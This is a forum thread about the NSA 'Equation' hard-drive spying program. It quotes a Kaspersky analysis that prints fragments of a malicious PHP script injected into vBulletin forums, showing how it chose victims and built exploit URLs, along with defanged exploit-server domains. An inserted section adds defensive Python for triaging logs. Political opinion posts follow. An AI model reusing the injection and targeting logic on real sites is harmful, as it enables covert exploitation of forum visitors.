Surveillance software hidden deep within hard drives


LazyDog

NSA hiding Equation spy program on hard drives


"The US National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world's computers, according to cyber researchers and former operatives.


That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations."

 
There is no safe place in this world.... America has the power to know each and every thing in every part of the world.
 
If you have a secret, don't put it out there on the internet. Simple.
 
People are busy, man.
There is an article from Kaspersky I was going through that explains who the "Equation group" is.


15. How do victims get selected for infection?

The EQUATION group sometimes selects its victims with surgical precision. When precision is not possible, the victims are targeted by a validator (DOUBLEFANTASY) implant and subsequently disinfected if they do not appear to be “interesting” to the attackers.

Here are some web-based targeting examples from the Equation group:

On March 2, 2013, a Kaspersky Lab user browsing an online forum was attacked with an exploit from one of the Equation group’s exploitation servers:

2013-03-02 – technicalconsumerreports[.]com/modular/assemble.php?params=YoGKKdExT[snip]cS5kS5t0bvGQyB8miDu+Agn – detected HEUR:Exploit.Script.Generic

The attack was unsuccessful as it was caught by our product and the user was protected. The attack was targeting Firefox 17 (TOR Browser), using an unknown exploit that we have not recovered.

Looking further, we identified a few other known Equation servers used in similar attacks even earlier:

2012-12-11 – technology-revealed[.]com/diagram/navigate.html?overlay=AL[snip]OISn6sI1&sn=d1[SNIP]dd

These attacks were delivered in several ways – for example, while the user visited a number of Islamic Jihadist discussion forums, or via advertisements on popular websites in the Middle East.

The forums in question appear to have been compromised by a specific PHP script that exploited only authenticated visitors. We were able to obtain one of these PHP scripts embedded in a discussion forum:

(Image: Malicious PHP script injected into hacked discussion forums)

This PHP script provides a multitude of interesting information about the attacks. It was first designed to work as part of vBulletin, a commercial forum platform. It specifically checks if the visitor’s username MD5 matches two values:
• 84b8026b3f5e6dcfb29e82e0b0b0f386 – MD5 of “Unregistered”
• e6d290a03b70cfa5d4451da444bdea39 – unknown MD5

In practice, this means that only logged-in users will be exploited. Next, the PHP exploitation script checks if the user comes from a specific address range:
• if(preg_match('/^(64.38.3.50|195.28.|94.102.|91.93.|41.130.|212.118.|79.173.|85.159.|94.249.|86.108.)/',IPADDRESS)){return "";}

Converting the ranges to their respective countries (except for 64.38.3.50, which is the only specific IP mentioned) we get the following TOP 3 countries that will NOT be exploited:
1. Jordan
2. Turkey
3. Egypt

This means that the attackers have taken special care not to infect users visiting from certain ISPs in these countries. If the visitors are from any other IP range, the PHP script constructs an exploitation URL which includes the logged in vBulletin forum name:
$htt="http://technology-revealed[.]com/expand/order.php?design=ABRSRgDQlkUALAxGANDrRuQQofe6Y0THS8E3hfBC+M+k7CdBmTH5gAkLvgV8EV3ULW+7KoUjbJ4UOFU6SVOtgEK7zTgPPNoDHz4vKecDGe7OzDmJlvwKvc5uYg/I/5x9";
$htt=$htt."&sn=".bin2hex(substr($u,0,14));

The vBulletin forum username is stored in hex, as the “sn=” parameter to the exploit site. The exploit site can choose to hit the visitor with an exploit depending on the username, meaning that the attackers are taking great care to infect only very specific targets on these forums.

Interestingly, the PHP script produces a different HTML page for iPhone visitors:
• if (preg_match('/iPhone/',$_SERVER['HTTP_USER_AGENT'])){$scroll='yes';}

This indicates that the exploit server is probably aware of iPhone visitors and can deliver exploits for them as well; otherwise, the exploitation URL can simply be removed for these visitors.

Most recently, the attackers used Java exploits, delivered through a specific server to visitors from the Middle East via advertising networks on popular websites. Here’s an example:
standardsandpraiserepurpose[.]com/login?qq=5eaae4d[SNIP]0563&rr=1&h=cc593a6bfd8e1e26c2734173f0ef75be3527a205

These 2013-2014 attacks make use of a new domain, standardsandpraiserepurpose[.]com. Interesting to point out the similarity in the URL construction, with parameters “rr=1”, followed by “h=” a value resembling a SHA1 hash, possibly the specific targeted username. Other collected “h=” values include the following:
0044c9bfeaac9a51e77b921e3295dcd91ce3956a
06cf1af1d018cf4b0b3e6cfffca3fbb8c4cd362e
3ef06b6fac44a2a3cbf4b8a557495f36c72c4aa6
5b1efb3dbf50e0460bc3d2ea74ed2bebf768f4f7
930d7ed2bdce9b513ebecd3a38041b709f5c2990
e9537a36a035b08121539fd5d5dcda9fb6336423

Considering the length and format, one might suspect they are a SHA1 hash, however, unlike the forum MD5 hashes, we couldn’t break any of them.

The exploits from standardsandpraiserepurpose[.]com targeted several Kaspersky Lab users and were all unsuccessful. The server attempts three different Java exploits, containing the same payload stored as “info.dat” inside the Java archive. These are simple downloaders that contain shellcode to download and execute the next stage from the C&C:

Unfortunately, we weren’t able to download a copy of the next stage as the URL was already dead at the time of checking, or else it is only served and built specifically for victims at specific IPs. Another unusual aspect of targeting included multiple infection attempts against users of a certain satellite internet provider in Afghanistan.

SOURCE
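The excerpt above describes how the injected script built its exploitation URL (the forum username hex-encoded into an "sn=" parameter, later a 40-hex-character "h=" value next to "rr=1") and how it gated victims on an MD5 of the username. The following Python is an added example by the editor, not code from the Kaspersky report or from the forum poster: it shows how a defender can triage proxy or web-server logs for that request pattern, recover the targeted username from a well-formed "sn=" value, and resolve an MD5 gate against a list of candidate usernames the way the report resolved "Unregistered". The domains and hash values come from the excerpt; the sample log lines, the "exampleuser" value and the function names are constructed for the example.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlsplit

# Domains named in the Kaspersky excerpt, kept de-fanged as written there.
KNOWN_EXPLOIT_DOMAINS = {
    "technicalconsumerreports[.]com",
    "technology-revealed[.]com",
    "standardsandpraiserepurpose[.]com",
}

HEX40 = re.compile(r"^[0-9a-f]{40}$")  # length/format of the "h=" values


def refang(text: str) -> str:
    """Turn the report's de-fanged notation ("[.]") back into a real dot."""
    return text.replace("[.]", ".")


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def decode_sn(sn: str):
    """Recover the username carried by an "sn=" parameter.

    The excerpt shows sn= being built as bin2hex(substr($u,0,14)), so a
    well-formed value is the hex of at most 14 bytes of the forum username.
    Anything that is not valid hex (such as the [SNIP]ped value) yields None.
    """
    try:
        raw = bytes.fromhex(sn)
    except ValueError:
        return None
    if not raw or len(raw) > 14:
        return None
    return raw.decode("utf-8", errors="replace")


def analyse_url(url: str) -> dict:
    """Classify one request URL against the patterns the excerpt describes."""
    url = refang(url)
    if "://" not in url:
        url = "http://" + url  # the excerpt lists URLs without a scheme
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    sn = query.get("sn", [""])[0]
    h = query.get("h", [""])[0]
    return {
        "host": host,
        "known_domain": host in {refang(d) for d in KNOWN_EXPLOIT_DOMAINS},
        "targeted_username": decode_sn(sn) if sn else None,
        "sha1_like_h": h if HEX40.match(h) else None,
        "rr_flag": query.get("rr", [""])[0] == "1",
    }


def triage(urls):
    """Return findings only for requests that reached a known exploit domain."""
    return [f for f in (analyse_url(u) for u in urls) if f["known_domain"]]


def match_md5(target_hex: str, candidates):
    """Find which candidate string hashes to target_hex, or None.

    This is the check that turns an opaque MD5 gate in an injected script
    (like the "Unregistered" one in the excerpt) into a readable username.
    """
    target_hex = target_hex.lower()
    for cand in candidates:
        if md5_hex(cand) == target_hex:
            return cand
    return None


# Constructed sample log (not real traffic): two URLs quoted in the excerpt,
# one unrelated request, and one with a made-up, decodable sn= value
# ("design=XXXX" is a placeholder, not a value from the report).
SAMPLE_URLS = [
    "technology-revealed[.]com/diagram/navigate.html?overlay=AL[snip]OISn6sI1&sn=d1[SNIP]dd",
    "standardsandpraiserepurpose[.]com/login?qq=5eaae4d[SNIP]0563&rr=1&h=cc593a6bfd8e1e26c2734173f0ef75be3527a205",
    "http://example.org/index.php?sn=6578616d706c6575736572",
    "http://technology-revealed[.]com/expand/order.php?design=XXXX&sn=6578616d706c6575736572",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_URLS):
        print(finding)
    # Resolve the first MD5 gate from the excerpt against a short candidate list.
    print(match_md5("84b8026b3f5e6dcfb29e82e0b0b0f386", ["Guest", "Unregistered"]))
```

Only requests to the three domains from the excerpt are reported, so a decodable "sn=" on an unrelated host (the example.org line) is ignored rather than raising a false alarm; the "h=" values are only format-checked, since the report itself could not reverse them.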
 
People are busy, man.
There is an article from Kaspersky I was going through that explains who the "Equation group" is.

Man, this world is not fair. The article is very interesting, but you have to scratch your head and wonder with your own mind that there's a cold war between the USA and Russia.
Now I can see the Russian government reinforcing Kaspersky Lab to expose those USA evils which were done long ago by the USA, after exposing the cyber espionage group of Russia.... Just see https://www.fireeye.com/blog/threat...-into-russias-cyber-espionage-operations.html

I ain't defending the hypocritical evils of Obama's government of the USA,
but some can judge me with their own stupidity.
Add to that, the president of Ukraine was elected constitutionally, but after engaging in a close relationship with Russia, the USA decided to intervene with riots to expel the freely elected president of Ukraine.

The USA wants to rule the world with their own currency but they're pissed off by Russia.
It is very sad that a democratic state like the US conducts those evils on the internet, but when we judge it we should think out of the box, not like those one-step thinkers.

snipa
 